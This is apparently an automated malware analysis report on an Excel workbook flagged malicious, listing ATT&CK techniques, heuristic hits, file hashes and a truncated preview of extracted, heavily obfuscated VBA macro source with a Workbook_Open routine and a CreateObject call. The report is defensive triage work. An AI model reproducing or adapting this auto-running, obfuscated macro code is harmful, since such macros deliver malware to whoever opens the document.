Verdict: MALICIOUS
Risk Score: 202
Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The file is an OOXML document containing a Workbook_Open VBA macro. This macro utilizes Shell() and CreateObject calls, indicating an attempt to execute arbitrary code. The obfuscated VBA code within 'macros.bas' likely serves to download and execute a secondary payload, a common technique for malware delivery.
Heuristics (6)
- VBA project inside OOXML (severity: medium; 4 related findings; rule OOXML_VBA): Document contains a VBA project — VBA macros present
- Shell() call in VBA (severity: critical; rule OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (severity: high; rule OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17454 bytes | 2a14e847e3acbe656f000b9c774ef5ade9b0c5f982fd64842ebe05edad8db3ca | No threats found | likely (carved artifact contains 8 long base64-like blobs) |
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
wokeaWVwYpIABSOl.gpY_LPERzvchzhak6ewM
While 27 = 9265
Dim dtSjjaXIvFAYfIddCcJFovWPKs_zTFsqxDB5EclypHC As Variant
Wend
Dim oaHRW6F3BkEK As Integer
While 13 = 4163
Dim rUBXzUhxoVSkbFhWi1UYfrrxCZp4MLq_q2SiC_ubGSWQGfyPV As Variant
Wend
Dim rSIOpn9mLTYnnja As Integer
While 7 = 9270
Dim oM3jw9Tc_2QKTYpejYfe3fyALS6ysUwcs5l3mNbVWy_VW As Variant
Wend
Dim anLfyxNFDgHX As Integer
While 8 = 6684
Dim WbCdtr_xbXwv2T6HGDZaltorR4ghUnVcdu1_S3DVQi9NXs6bR76cq As Variant
Wend
Dim NlwSJzJfawASQ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "wokeaWVwYpIABSOl"
Dim AQuOt5BbseSCAQFHMU9g2_r2Ucn4UKfLMvX9sCXU_r3wQlHAzGX1SOIAi34PPFFg As String
Function Fc6yN9DHBuZSi7DNXq3ugeMK_qMJuGJLDZy9(wGKfe7PFC7Jpjs_lzyBaHDerWzk9yoBOiAbHf9ElvkgLBRLicvACV6JslcGnTPQW44EiO1E1sXngeQo_mBdBm82mysfBzZQeRHQFKlRlpIS8PmLSxC)
While 1 = 9477
Dim WU6tUetugytTOGMNA_eTYIbNHyKjA5RezWuudQXFMD4Xo As Variant
Wend
Dim zE7im6wRVNM2q As Integer
While 22 = 9032
Dim jeRHskfMd2VbtspWFTNDiQrNAW9dKbGf2wp2x_ As Variant
Wend
Dim SR1ZUMjF2LF As Integer
While 18 = 2735
Dim N39xFRvDFUlABAsyi7BxhBA6KG5dm4duWOLMg As Variant
Wend
Dim DoW_t78ozW As Integer
Dim H4J2uVk22n69QUUale2oo6Wn5dNg4p8TOPsekjDskIM9xRdY22YWS
While 5 = 5218
Dim Tdtf5IQUL2Bk8VQYL1zmuwdQdPnrx_BOUsj93Whk_3_Udbp_vTt As Variant
Wend
Dim FxLkf_bAmeigG As Integer
While 11 = 6458
Dim zuNMuQeyQNg2wHvBjm6cS5ZHFD9ZU4_eU2drMaNcx5xinsszo9 As Variant
Wend
Dim C2lDw4T_Eq As Integer
While 16 = 2258
Dim R_bVHAe4mCwGWanXE1cWSHuUzL2PDjWGTfJsaaYmLxLk As Variant
Wend
Dim J5cJXWxbkrVH As Integer
Dim uqY8AEjm8b4tEP3d3JUJK1go1X_LOWgYI5fqNz9TIlpPbc2vOnPcBvx4HtFkEWWi4cjIsKNBJA_hIPKVfL7jFDWVFlgdsWNvNEU93rCCYMQAuNt2hs_2YwbzELBEntRwuMSC4Lbw
While 22 = 5173
Dim SFe6GNzCoov1O57nazIe5HI5sq2pu5flIAYT5cd88H6eGl As Variant
Wend
Dim bZHAthzMI6 As Integer
While 8 = 5490
Dim jKZUHPsHIpNelr8TJfvKnvFvXOk3uCRw As Variant
Wend
Dim NXTPClx2KV As Integer
While 11 = 9180
Dim o6wZCXWSa8Pw_n63nzVEVZPMWpQhr39QxJEaaJzUo9UOF As Variant
Wend
Dim fKXo5LU91gNo As Integer
While 21 = 6317
Dim iBUFyjg8883hcab9AYWD_Ezd22vomR7l1v1HdMzWx As Variant
Wend
Dim QGhQzKctV8ZII As Integer
While 16 = 777
Dim nbJzN6w1ToAOpqiScvi9Or8QLBpR5OSeapGW7m93i66afAH As Variant
Wend
Dim c3Y2J1J35d3mK As Integer
While 22 = 5755
Dim Od5DUew9iJUywoXRveuJ3KXeWGnPwK As Variant
Wend
Dim D_vm_A1EAMH4rD As Integer
Set uqY8AEjm8b4tEP3d3JUJK1go1X_LOWgYI5fqNz9TIlpPbc2vOnPcBvx4HtFkEWWi4cjIsKNBJA_hIPKVfL7jFDWVFlgdsWNvNEU93rCCYMQAuNt2hs_2YwbzELBEntRwuMSC4Lbw = CreateObject(AQuOt5BbseSCAQFHMU9g2_r2Ucn4UKfLMvX9sCXU_r3wQlHAzGX1SOIAi34PPFFg)
While 11 = 1144
Dim BWJviH9GaQD_YpLzfKVQQy_BSQ4Xs7tPpZTsbdLB36gch9k As Variant
Wend
Dim I3Ip6gZuLWHaQN As Integer
While 16 = 1837
Dim iWdgwX8UbWB8TWUPebSpseiOwsNoFURB5wShC6u As Variant
Wend
Dim jlxYun7KBY62pG As Integer
While 13 = 1058
Dim kdCwMsCHRMF_9CfDvLhprC5_wkzfKNJbk3RQOtxKq
... (truncated)
| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 50688 bytes | d577881f3d1a9d86a6d2d401f3ccd22212f0052f902239fd0b88dd905c596f26 | No threats found | likely (carved artifact contains 8 long base64-like blobs) |